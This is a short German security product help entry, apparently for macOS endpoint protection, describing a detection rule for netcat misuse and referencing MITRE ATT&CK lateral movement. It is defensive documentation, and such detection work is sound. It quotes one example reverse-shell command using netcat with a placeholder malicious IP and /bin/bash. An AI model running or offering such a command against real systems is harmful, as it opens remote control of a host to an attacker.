Mit der ImproperUseOfNetcat-Analyse wird die Ausführung von Netcat Befehlen erkannt, die üblicherweise zur Initiierung von Remote-Shell-Sitzungen verwendet werden, wenn ein verdächtiges, nicht unterstütztes Prozessargument angegeben wird.
Bedrohungsakteure verwenden Netcat häufig, um Netzwerkverbindungen zwischen Endpunkten und Fernsitzungen zu C2-Servern (Command and Control) herzustellen, sobald sie in einem Netzwerk präsent sind. Eine Fernsitzung ermöglicht es einem Bedrohungsakteur, von außerhalb des Netzwerks mit dem Hostendpunkt zu kommunizieren und ihn zu kontrollieren. Auf anderen Unix basierten Systemen kann das Argument -E zusammen mit Netcat verwendet werden, um ein bestimmtes Programm über die Fernverbindung auszuführen, z. B. nc <malicious_ip> <port> -E /bin/bash. Netcat unter macOS unterstützt jedoch das Argument -E nicht, und die fehlgeschlagene Verwendung dieses Arguments ist ein Anzeichen für böswillige Absichten, da sowohl Penetrationstester als auch echte Bedrohungsakteure diesen Fehler häufig begehen.
Weitere Informationen über diese Art von Bedrohung finden Sie unter „MITRE ATT&CK Tactic: Lateral Movement“ und „MITRE ATT&CK Technique: Remote Services“.